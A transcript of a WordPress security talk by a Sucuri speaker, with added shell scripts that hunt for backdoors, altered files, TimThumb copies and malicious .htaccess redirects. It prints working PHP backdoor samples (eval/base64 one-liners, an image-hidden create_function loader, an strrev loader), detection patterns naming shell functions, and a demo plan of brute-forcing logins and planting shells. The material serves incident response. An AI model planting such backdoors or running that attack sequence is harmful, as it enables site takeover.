WordPress Security - Dealing With Today's Hacks

Transcript of WordPress Security - Dealing With Today's Hacks (46 slides)

Page 1: WordPress Security - Dealing With Today's Hacks

Page 2: WordPress Security - Dealing With Today's Hacks

04/11/2023 @sucuri_security @perezbox #wclv

SUCURI @ WORDCAMP

# WHOIS PEREZBOX

ID: Tony Perez

WHO: The Hulk

Username: Perezbox

Process: Sucuri

Services: InfoSec, Harleys, MMA, Guns

GeoIP: Menifee, California

Page 3: WordPress Security - Dealing With Today's Hacks


Page 4: WordPress Security - Dealing With Today's Hacks

Why listen to me? You don't have to, but…

I am not a designer or developer; my passion is Information Security, specifically Web Security.

Not an expert, passionate enthusiast.

I don't like people, I like packets, signatures and terminal.

Seriously though, our company:

Remediates 200 – 300 infected websites a day, 24/7/365

Performs 2 million+ malware website scans a month

Supports all CMS platforms and custom applications (e.g., WordPress, Joomla, osCommerce, vBulletin, Drupal, .NET, etc…)

Page 5: WordPress Security - Dealing With Today's Hacks


Thoughts To Kick Things Off

Information Security is about risk reduction.

If you’re looking for the “silver bullet” this is the wrong talk for you.

To think that you will never be infected or that you are immune to hacks is like saying you will never be sick.

If someone tells you the opposite you should slap them and have them pay you for wasting your time.

Prevention is ideal, detection is key… bats were created for ________ people…

Page 6: WordPress Security - Dealing With Today's Hacks

Know Your Enemy

They have more time and resources

They are intelligent

Majority of attacks are automated

Goal is to impact as many people as possible

Mindset – Own one, own them all…

It’s not personal, it’s business…

Page 7: WordPress Security - Dealing With Today's Hacks


Ok, so what’s the problem?

TODAY’s ISSUES:

The Ecosystem / Environment

Access Control

Software Vulnerabilities

Administration

Credential Management

Extensibility

Page 8: WordPress Security - Dealing With Today's Hacks


Today’s Focus

Ecosystem / Environment

Access Control

Dealing with Hacks

Page 9: WordPress Security - Dealing With Today's Hacks

The EcoSystem / Environment

None of these is a WordPress bug. Each is a hole in a layer WordPress sits on, and each was exploited in the wild in 2012 against the sites running on top of it:

Apache: malicious module injects iFrames

http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/

phpMyAdmin: mirror hacked (backdoored download)

http://sourceforge.net/blog/phpmyadmin-back-door/

PHP-CGI: remote code execution

http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the-wild.html

Plesk: vulnerable to SQLi attacks

http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to-malware.html

Page 10: WordPress Security - Dealing With Today's Hacks


Uh, what about WordPress?

Page 11: WordPress Security - Dealing With Today's Hacks

Logical Architecture

Everything below shares one box with WordPress, and a hole in any layer owns the site:

Linux Operating System

Apache (+ modules)

PHP (+ modules) / PHP-CGI

MySQL

Applications on top: WordPress, cPanel, Plesk, phpMyAdmin

Page 12: WordPress Security - Dealing With Today's Hacks

The EcoSystem / Environment

What can you do? Not much… it's completely outside of your control if you're using a shared or managed host.

But you can reduce risk: use a dedicated / VPS environment.

But recognize the responsibility that this entails: if what I mentioned previously doesn't make sense, skip to the next step.

Go with a managed host. Doesn't mean you'll be safer, but it does mean you'll have resources to lean on.

Page 13: WordPress Security - Dealing With Today's Hacks

Access is Key

On the server:

Kill accounts that are not in use.

FTP is the devil – slap yourself and switch to SFTP (FTP sends credentials and files in the clear).

Filter shell / SFTP access by IP and by keys; keys at a minimum.

Disable password authentication on the server (in sshd_config: PasswordAuthentication no, keep PubkeyAuthentication on, and set ChallengeResponseAuthentication no as well, otherwise PAM keyboard-interactive can still accept a password).

WordPress admin:

Multi-factor authentication on wp-admin.

Apache "Basic Access Authentication" in front of wp-admin and wp-login.php (exempt wp-admin/admin-ajax.php, which plugins call from the public front end, or you will break them).

Two-factor authentication on wp-login.php: Duo Two-Factor Authentication plugin.

Employ least privilege:

Users with the "administrator" role are not needed for everyday tasks.

Learn to use Editor, Author, Contributor, Subscriber.
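An added example (not part of the deck) for the "disable password authentication" item: a small audit of sshd_config against the settings above. sshd uses the first value it encounters for a keyword, so a hardening line appended below a permissive one changes nothing; the audit reproduces that rule. The three config files are constructed samples, the deploy user and the 203.0.113.0/24 range are placeholders, Match blocks and the "Keyword=Value" spelling are deliberately not handled, and on a real host `sshd -T` is the authoritative view of the effective configuration.

```sh
#!/bin/sh
# Added example, not from the original slides. Audits an sshd_config for the
# access settings the slide asks for. sshd keeps the FIRST value it sees for a
# keyword, so this reports the first occurrence and stops at the first Match
# block (assumption: Match blocks and "Keyword=Value" syntax are not handled).

lower() { printf '%s' "$1" | tr '[:upper:]' '[:lower:]'; }

# Effective (first) value of keyword $2 in file $1; prints nothing if unset.
sshd_effective() {
    awk -v key="$(lower "$2")" '
        tolower($1) == "match" { exit }                 # per-connection overrides start here
        tolower($1) == key && !found { print $2; found = 1 }
    ' "$1"
}

# One line per weak setting; no output means the file passes this audit.
sshd_audit() {
    cfg=$1
    pa=$(lower "$(sshd_effective "$cfg" PasswordAuthentication)")
    pk=$(lower "$(sshd_effective "$cfg" PubkeyAuthentication)")
    pr=$(lower "$(sshd_effective "$cfg" PermitRootLogin)")
    cr=$(lower "$(sshd_effective "$cfg" ChallengeResponseAuthentication)")
    if [ "$pa" != no ]; then
        echo "PasswordAuthentication=${pa:-unset} (OpenSSH default is yes); want: PasswordAuthentication no"
    fi
    if [ "$pk" = no ]; then
        echo "PubkeyAuthentication=no; keys are the whole point; want: PubkeyAuthentication yes"
    fi
    if [ "$pr" = yes ]; then
        echo "PermitRootLogin=yes; log in as a named user and escalate; want: PermitRootLogin no"
    fi
    if [ "$cr" != no ]; then
        echo "ChallengeResponseAuthentication=${cr:-unset}; with UsePAM this still takes passwords via keyboard-interactive; want: no"
    fi
}

# Constructed sample configs: shipped defaults, a correctly hardened file, and a
# file that looks hardened but puts the permissive line first (so it wins).
make_sample_configs() {
    root=$1
    cat > "$root/weak" <<'EOF'
# typical shipped defaults: commented out or permissive
Port 22
#PasswordAuthentication yes
PermitRootLogin yes
ChallengeResponseAuthentication yes
EOF
    cat > "$root/hardened" <<'EOF'
Port 22
PubkeyAuthentication yes
PasswordAuthentication no
ChallengeResponseAuthentication no
PermitRootLogin no
AllowUsers deploy@203.0.113.0/24
EOF
    cat > "$root/ordered-wrong" <<'EOF'
PasswordAuthentication yes
PermitRootLogin no
PasswordAuthentication no
EOF
}

demo() {
    tmp=$(mktemp -d); make_sample_configs "$tmp"
    for f in weak ordered-wrong hardened; do
        echo "== $f:"; sshd_audit "$tmp/$f"
    done
    rm -rf "$tmp"
}
demo
```

The AllowUsers line in the hardened sample is the "filter by IP" half of the slide: sshd accepts USER@HOST patterns with CIDR ranges, so only the deploy user from that network is even considered for key authentication.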

Page 14: WordPress Security - Dealing With Today's Hacks


Gah!?!?!?!?!?!?!

Page 15: WordPress Security - Dealing With Today's Hacks

WordPress Loving Infections

Defacements

Backdoors

Pharma Hack

Injections (iFrame specifically)

Malicious Redirects

Phishing

Page 16: WordPress Security - Dealing With Today's Hacks

Before We Dive In

LINUX / UNIX tools:

curl

find

grep

diff

Page 17: WordPress Security - Dealing With Today's Hacks

Command Usage – Hunting TimThumb

Find every bundled copy and its version:

# grep -Eir --include "*thumb.php" 'define.*VERSION' .

- Then -

Replace each out-of-date copy with the current upstream file. The slide's original command used -D -, which dumps the HTTP headers into the same redirected file as the body and breaks the PHP; write only the body with -o:

# curl -A "Windows" -o /path-to-file/timthumb.php http://timthumb.googlecode.com/svn/trunk/timthumb.php

(Google Code has since shut down, so this URL no longer resolves; fetch from wherever the library is currently maintained.)
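An added example (not from the slides) that turns the grep above into an inventory: every *thumb.php under a docroot is listed with the value of its VERSION constant, and copies below a minimum version you pass in are flagged. The sample theme tree and its version numbers are constructed for the demo, and the minimum passed to it is an arbitrary assumption, not a statement about which TimThumb release is safe.

```sh
#!/bin/sh
# Added example, not from the original slides: inventory bundled TimThumb
# copies and flag those below a caller-supplied minimum version.
# Sample tree and version numbers below are constructed for the demo.

# Print "<version> <path>" for each *thumb.php that defines VERSION.
# Version comes first so a path containing spaces survives later splitting.
timthumb_versions() {
    grep -RilE --include='*thumb.php' "define[[:space:]]*\([[:space:]]*['\"]VERSION['\"]" "$1" \
    | sort | while IFS= read -r f; do
        v=$(sed -nE "s/.*define[[:space:]]*\([[:space:]]*['\"]VERSION['\"][[:space:]]*,[[:space:]]*['\"]([0-9.]+)['\"].*/\1/p" "$f" | head -n 1)
        echo "${v:-unknown} $f"
    done
}

# True (exit 0) when dotted version $1 is lower than $2, compared field by field
# so that 2.10 sorts above 2.9 (plain string comparison gets that wrong).
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".");
        n = (na > nb) ? na : nb;
        for (i = 1; i <= n; i++) {
            xi = (i <= na) ? x[i] + 0 : 0; yi = (i <= nb) ? y[i] + 0 : 0;
            if (xi < yi) exit 0;
            if (xi > yi) exit 1;
        }
        exit 1;
    }'
}

# Copies below minimum $2 (or with an unparseable version) under docroot $1.
outdated_timthumbs() {
    min=$2
    timthumb_versions "$1" | while IFS= read -r line; do
        v=${line%% *}; f=${line#* }
        if [ "$v" = unknown ] || version_lt "$v" "$min"; then echo "$v $f"; fi
    done
}

# Constructed sample: two themes and a plugin, each shipping its own copy.
make_sample_themes() {
    root=$1
    mkdir -p "$root/wp-content/themes/old/scripts" "$root/wp-content/themes/new/inc" \
             "$root/wp-content/plugins/gallery"
    printf "<?php\ndefine ('VERSION', '1.19');\n// ... rest of the library ...\n" > "$root/wp-content/themes/old/scripts/timthumb.php"
    printf "<?php\ndefine('VERSION', '2.8.14');\n" > "$root/wp-content/themes/new/inc/thumb.php"
    printf "<?php\ndefine ('VERSION', '2.8.10');\n" > "$root/wp-content/plugins/gallery/timthumb.php"
    printf "<?php\n// not TimThumb, just a namesake with no VERSION constant\n" > "$root/wp-content/themes/new/inc/mythumb.php"
}

demo() {
    tmp=$(mktemp -d); make_sample_themes "$tmp"
    echo "== all copies:";            timthumb_versions "$tmp"
    echo "== below 2.8.14 (assumed minimum for the demo):"; outdated_timthumbs "$tmp" 2.8.14
    rm -rf "$tmp"
}
demo
```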

Page 18: WordPress Security - Dealing With Today's Hacks

Command Usage – Identify Change

Detect recent changes:

find . -type f -ctime -1 | more   - OR -   find ./ -type f -mtime -1

-ctime -N = inode status changed less than N days ago (content, permissions or ownership); -ctime -1 is the last 24 hours. (The slide's -ctime -0 matches nothing: it asks for "less than zero days".)

-mtime -N = content modified less than N days ago; -1 (1 day), -2 (2 days).

Prefer -ctime for triage: an attacker can backdate mtime with touch to make a dropped file blend in, but touch cannot set ctime.

Detect differences:

diff -qr /path/dir1 /path/dir2

(for example, a clean download of the same WordPress version against the live install; -q lists only which files differ, -r recurses.)
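A worked version of this slide, added here as an example and not part of the original deck: it builds a throwaway sample site in a temp directory (constructed data, including a dropped PHP shell whose mtime is forged with touch), shows that -mtime misses the forged file while -ctime catches it, and finishes with diff -qr against a clean copy. Only POSIX find, touch and diff are used.

```sh
#!/bin/sh
# Added example, not from the original slides: recent-change hunting with
# find, why ctime beats mtime when the attacker has touch, and a tree diff
# against a known-clean copy. The sample site is constructed inline.

# Files whose inode status changed in the last N days (content, perms, owner).
# touch cannot reset ctime, so a backdated drop still shows up here.
recently_changed() {
    rc_dir=$1; rc_days=$2
    find "$rc_dir" -type f -ctime "-$rc_days" | sort
}

# Same window, but trusting the modification time an attacker can forge.
recently_modified() {
    rm_dir=$1; rm_days=$2
    find "$rm_dir" -type f -mtime "-$rm_days" | sort
}

# Files that differ between a clean reference tree and the live tree.
# diff -qr prints "Files A and B differ" and "Only in DIR: name" lines.
tree_diff() {
    diff -qr "$1" "$2" || true      # diff exits 1 whenever the trees differ
}

# Constructed sample: a clean copy and a live copy of a two-file site; the live
# copy has a shell dropped into uploads with its mtime forged back to 2020-01-01.
make_sample_site() {
    root=$1
    mkdir -p "$root/clean/wp-content/uploads" "$root/live/wp-content/uploads"
    printf '<?php echo "hello";\n' > "$root/clean/index.php"
    cp "$root/clean/index.php" "$root/live/index.php"
    printf '<?php @eval($_POST["c"]);\n' > "$root/live/wp-content/uploads/cache.php"
    touch -t 202001010000 "$root/live/wp-content/uploads/cache.php"   # forge mtime
}

demo() {
    tmp=$(mktemp -d); make_sample_site "$tmp"
    echo "== -mtime -1 (forged, misses cache.php):"; recently_modified "$tmp/live" 1
    echo "== -ctime -1 (catches it):";               recently_changed  "$tmp/live" 1
    echo "== diff -qr clean vs live:";               tree_diff "$tmp/clean" "$tmp/live"
    rm -rf "$tmp"
}
demo
```

The diff pass is the one to lean on when the intrusion is older than your find window: recent-change listings only help if you look within the window, a comparison against a pristine copy of the same version has no such limit.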

Page 19: WordPress Security - Dealing With Today's Hacks

Defacements: hacktivism at its finest… you now support a cause!?!?!

Page 20: WordPress Security - Dealing With Today's Hacks

Defacements

Hacktivism 101: annoying as S*&T.

Places to look:

index.html

index.php (root directory)

wp-content

Theme directory

GREP is your friend (search for the defacer's tag, whatever string the defaced page shows):

grep -ri 'sniper399' .

Page 21: WordPress Security - Dealing With Today's Hacks

Backdoors: it's ok to cry a little…

Page 22: WordPress Security - Dealing With Today's Hacks

Backdoors: common terms

is_bot

eval

base64_decode

fopen

fclose

readfile

edoced_46esab (base64_decode spelled backwards: the script rebuilds the name with strrev() at runtime, so a plain grep for base64_decode never sees it)

exec

system

shell_exec

gzuncompress

popen

FilesMan (the action parameter of the WSO web shell)

grep -RPl --include='*.php' '\b(system|exec|passthru|shell_exec|base64_decode|eval)\s*\(' /var/www

(The slide's pattern ended in "|)", an empty alternative that matches every "(" in every file. Expect hits in legitimate plugins too: these are strings to read around, not verdicts.)

Page 23: WordPress Security - Dealing With Today's Hacks

Pharma Hack: erectile dysfunction pills are leading ads.. Who knew..

Page 24: WordPress Security - Dealing With Today's Hacks

Pharma Hack: multi-million $ business

Rarely distributes malware

Impression-based affiliate marketing

Targets Google's Search Engine Result Pages (SERP)

Odds of malware distribution are actually low

Tricks: embedded within core files

Look for ".tmp" directories

Page 25: WordPress Security - Dealing With Today's Hacks

Pharma Hack, cntd..

Try using curl to emulate Googlebot and a Windows browser, then compare the two responses (the spam is usually served only to the crawler, which is why you don't see it):

curl -L -A "Googlebot/2.1 (+http://www.google.com/bot.html)" http://someinfectedwebsite.com

Google Webmaster Tools: Fetch as Googlebot.

Check your theme's index.php for things like this (PHP code hidden in an "image", read in and executed on every request; create_function was removed in PHP 8, so newer variants reach for eval or include, but the idea is the same):

<?php $wp__theme_icon=@create_function('',@file_get_contents('/public_html/wp-content/themes/my-really-good-theme/images/s.jpg'));$wp__theme_icon(); ?>
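The indicator list from the Backdoors slide and the image trick shown just above, rolled into one added triage script (example code, not Sucuri's or the speaker's). It sweeps a tree three ways: PHP files calling the usual execution and decoding functions, PHP files carrying those names spelled backwards (the strrev() obfuscation behind edoced_46esab), and image files that contain a PHP open tag. The sample tree it scans is constructed inline, and the patterns are POSIX ERE so they work with greps that lack -P.

```sh
#!/bin/sh
# Added example, not from the original slides: a three-pass grep triage for
# the backdoor indicators listed above. A hit means "open this file and read
# it", not "this file is malicious"; legitimate plugins use some of these calls.

# Pass 1: code-execution / decoding calls in PHP files. The leading group
# emulates a word boundary in POSIX ERE so no grep -P is needed.
DANGEROUS='(^|[^A-Za-z0-9_$])(eval|assert|system|exec|passthru|shell_exec|popen|proc_open|base64_decode|gzuncompress|gzinflate|str_rot13|create_function)[[:space:]]*\('

scan_dangerous_calls() {
    grep -RlaE --include='*.php' "$DANGEROUS" "$1" | sort
}

# Pass 2: the same names reversed, as a strrev()-obfuscated dropper carries them
# (edoced_46esab = base64_decode). Short reversals such as "lave" are left out: too noisy.
REVERSED='edoced_46esab|cexe_llehs|urhtssap|sserpmocnuzg|etalfnizg|noitcnuf_etaerc|nepo_corp'

scan_reversed_names() {
    grep -RliaE --include='*.php' "$REVERSED" "$1" | sort
}

# Pass 3: a PHP open tag inside files that claim to be images, the trick the
# theme index.php snippet above relies on (code parked in s.jpg, run by PHP).
scan_php_in_images() {
    grep -RlaE --include='*.jpg' --include='*.jpeg' --include='*.png' \
         --include='*.gif' --include='*.ico' '<\?(php|=)' "$1" | sort
}

# Constructed sample tree: one benign theme file and three planted artefacts.
make_sample_tree() {
    root=$1
    mkdir -p "$root/wp-content/themes/demo/images" "$root/wp-content/uploads/.tmp"
    # benign: should not be flagged by any pass
    printf '<?php function demo_title() { echo get_bloginfo("name"); }\n' > "$root/wp-content/themes/demo/functions.php"
    # classic one-liner shell (pass 1)
    printf '<?php @eval(base64_decode($_REQUEST["x"]));\n' > "$root/wp-content/uploads/wp-cache.php"
    # names rebuilt with strrev(), no literal eval( or base64_decode( (pass 2 only)
    printf '<?php $f = strrev("edoced_46esab"); $g = strrev("lave"); $g($f($_POST["p"]));\n' > "$root/wp-content/uploads/.tmp/loader.php"
    # PHP hidden behind a PNG header, plus the theme index.php that executes it (passes 3 and 1)
    printf '\211PNG\r\n\032\n<?php echo "pharma links here"; ?>\n' > "$root/wp-content/themes/demo/images/s.jpg"
    printf '<?php $wp__theme_icon=@create_function("",@file_get_contents(__DIR__."/images/s.jpg"));$wp__theme_icon();\n' > "$root/wp-content/themes/demo/index.php"
}

demo() {
    tmp=$(mktemp -d); make_sample_tree "$tmp"
    echo "== dangerous calls:";   scan_dangerous_calls "$tmp"
    echo "== reversed names:";    scan_reversed_names "$tmp"
    echo "== PHP inside images:"; scan_php_in_images "$tmp"
    rm -rf "$tmp"
}
demo
```

The loader in .tmp is the reason pass 2 exists: it executes base64-decoded input exactly like the one-liner, yet contains none of the strings the slide's grep looks for.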

Page 26: WordPress Security - Dealing With Today's Hacks


Pharma Hack, cntd..

Page 27: WordPress Security - Dealing With Today's Hacks

Injections: it only hurts for a minute…

Page 28: WordPress Security - Dealing With Today's Hacks

Injections

Invisible iFrames – executing in your visitors' browsers

Contributing to drive-by downloads, pharma, XSS, CSRF

Places to check – files that generate output on every page: theme JS files, header.php, index.php, functions.php, footer.php

Page 29: WordPress Security - Dealing With Today's Hacks

Injections, cntd…

PHP iFrame injection: look for dropped files named count##.php

Check all index.php files and theme JS files

Example (screenshot in the original deck, not reproduced in this transcript)

Page 30: WordPress Security - Dealing With Today's Hacks

Injections, cntd…

Pharma link injections

Drive-by downloads

Page 31: WordPress Security - Dealing With Today's Hacks

Malicious Redirects: WTF?!?! Why don't I understand what it says?

Page 32: WordPress Security - Dealing With Today's Hacks

Malicious Redirects: redirects your user to a domain distributing malware, fundamentally different from an iFrame injection that executes in your browser.

8 out of 10 times, check your .htaccess file – all of them (the redirect is often dropped into a subdirectory's .htaccess, not the root one):

# find /var/www -name .htaccess -type f | wc -l

Count them, then read every one. Look for RewriteCond lines keyed on %{HTTP_REFERER} or %{HTTP_USER_AGENT} followed by a RewriteRule whose target is a full external URL: that is a redirect that only fires for visitors arriving from a search engine, which is why the site owner never sees it.

Check for backdoors also – often a sign of a bigger issue.
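An added example, not from the slides, of the .htaccess hunt just described: it lists every .htaccess under a docroot and flags the ones whose RewriteRule points at an absolute URL, noting when the rule is gated on the referrer or user agent (the cloaked redirect that only fires for search-engine visitors). The docroot and the malicious.example hostname are constructed for the demo; the stock WordPress permalink block is included to show that it is not flagged.

```sh
#!/bin/sh
# Added example, not from the original slides: enumerate every .htaccess under
# a docroot and flag off-site redirects. Hostnames below are placeholders.

list_htaccess() {
    find "$1" -name .htaccess -type f | sort
}

# Print "<file>: <reason>" for each .htaccess that sends visitors elsewhere.
flag_redirects() {
    list_htaccess "$1" | while IFS= read -r f; do
        # RewriteRule whose target is an absolute URL: an off-site redirect.
        # Stock WordPress rules rewrite to /index.php, which carries no scheme.
        if grep -qiE '^[[:space:]]*RewriteRule[[:space:]].*[[:space:]]https?://' "$f"; then
            # Gated on who is visiting: the cloaking pattern (search traffic only).
            if grep -qiE '^[[:space:]]*RewriteCond[[:space:]]+%[{]HTTP_(REFERER|USER_AGENT)[}]' "$f"; then
                echo "$f: conditional off-site redirect (referrer/user-agent cloaking)"
            else
                echo "$f: off-site redirect"
            fi
        fi
        # A 404 handler that is itself an external URL also redirects visitors.
        if grep -qiE '^[[:space:]]*ErrorDocument[[:space:]]+[0-9]{3}[[:space:]]+https?://' "$f"; then
            echo "$f: ErrorDocument points off-site"
        fi
    done
}

# Constructed docroot: the stock WordPress block (benign), an injected cloaked
# redirect in uploads, and a hardening-only file in wp-includes (benign).
make_sample_docroot() {
    root=$1
    mkdir -p "$root/wp-content/uploads" "$root/wp-includes"
    cat > "$root/.htaccess" <<'EOF'
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
EOF
    cat > "$root/wp-content/uploads/.htaccess" <<'EOF'
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|bing|yahoo)\. [NC]
RewriteRule ^(.*)$ http://malicious.example/in.php?q=$1 [R=302,L]
EOF
    cat > "$root/wp-includes/.htaccess" <<'EOF'
<Files *.php>
Deny from all
</Files>
EOF
}

demo() {
    tmp=$(mktemp -d); make_sample_docroot "$tmp"
    echo "== .htaccess files found: $(list_htaccess "$tmp" | wc -l | tr -d ' ')"
    echo "== flagged:"; flag_redirects "$tmp"
    rm -rf "$tmp"
}
demo
```

Reading the flagged file is still required: a legitimate www-to-bare-domain or HTTP-to-HTTPS rule is also an absolute-URL RewriteRule, but it will point at your own host and will not be conditioned on the referrer.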

Page 33: WordPress Security - Dealing With Today's Hacks

Phishing: biggest growing problem, exceptionally difficult to detect…

Page 34: WordPress Security - Dealing With Today's Hacks


Phishing

Growing at a faster pace than traditional web-malware

No impact to readers, but tied to SPAM bots sending out emails like this:

Page 35: WordPress Security - Dealing With Today's Hacks


Phishing, cntd…

Page 36: WordPress Security - Dealing With Today's Hacks

Demonstration: bringing the point home

Page 37: WordPress Security - Dealing With Today's Hacks

Demo Objective

Use good tools for bad things – wpscan

Enumerate the users

Brute-force the user account's password

Insert an arbitrary backdoor shell for remote execution

Deface the website

Insert another shell backdoor that provides an interface

I have 5 minutes – ready?

Page 38: WordPress Security - Dealing With Today's Hacks

Keeping it Real: remember the risk discussion?

Page 39: WordPress Security - Dealing With Today's Hacks

Guard Access: revisit Slide 12 – access, access, access

It always comes down to access

We have to change the way we treat and think about access. All access – Server / Application

We are going through the same mistakes servers and desktops were making in the 90’s with access.

Know where you are surfing the web, do you really need to log in as an admin at the coffee shop?

Page 40: WordPress Security - Dealing With Today's Hacks

Password Dilemma

15-character password – 3 months to crack

Long / Complex / Unique: the key to passwords

Prefer a password manager. You don't? OK..

Passphrases work too: iLuvWCLVegas:2012:HrtAttckGrll

Come up with a process that works, stick to it:

One scheme: remember 8 characters, write down 8 characters, save 20 characters.

Second scheme: remember 20 characters, prefix them with the site name, end the sequence with some date.

Page 41: WordPress Security - Dealing With Today's Hacks

Kill PHP Execution

Kill PHP execution in directories that should only ever hold static files:

WP-INCLUDES

WP-CONTENT

UPLOADS – at a minimum

Drop an .htaccess containing this into each such directory (Apache 2.2 syntax):

<Files *.php>
Deny from all
</Files>

Caveats: on Apache 2.4 the equivalent directive is "Require all denied" (the 2.2 form only works there with mod_access_compat loaded); blocking all of wp-content breaks any plugin that serves a PHP endpoint from its own directory, which is why uploads is the safe minimum; and nginx ignores .htaccess entirely, so there the block has to go into the server configuration.

Page 42: WordPress Security - Dealing With Today's Hacks

Disable Theme / Plugin Editor

I'd take it a step further and remove the ability to install, but that's just me.

Modify wp-config.php with:

Disable the plugin / theme editor:

define('DISALLOW_FILE_EDIT', true);

- OR -

Disable plugin / theme update and installation (this implies DISALLOW_FILE_EDIT, and it also switches off WordPress's automatic background updates, so you then have to apply updates yourself through another route):

define('DISALLOW_FILE_MODS', true);

Page 43: WordPress Security - Dealing With Today's Hacks

Update: oldest version found in production – 1.5

Leading cause of cross-site contamination issues

Perhaps the simplest of tasks, yet we still find this:

Page 44: WordPress Security - Dealing With Today's Hacks

Plugins That Help

Clients:

Sucuri Security Premium

Duo Two-Factor Authentication

Theme-Check

BackupBuddy

Akismet

Non-Clients:

Duo Two-Factor Authentication

Limit Login Attempts

Theme-Check

BackupBuddy

Akismet

Page 45: WordPress Security - Dealing With Today's Hacks

Need a Hand?

Online Resources:

Sucuri Blog: http://blog.sucuri.net

SiteCheck Scanner: http://sitecheck.sucuri.net

Unmask Parasites: http://unmaskparasites.com

Perishable Press: http://perishablepress.com/category/web-design/security/

Secunia Security Advisories: http://secunia.com/community/advisories/search/?search=wordpress

Support Forums:

Hacked – http://wordpress.org/tags/hacked

Malware – http://wordpress.org/tags/malware

BadwareBusters – https://badwarebusters.org

Page 46: WordPress Security - Dealing With Today's Hacks

Sucuri

Tony Perez

http://sucuri.net | http://blog.sucuri.net

Twitter: @sucuri_security, @perezbox and @tonyonsecurity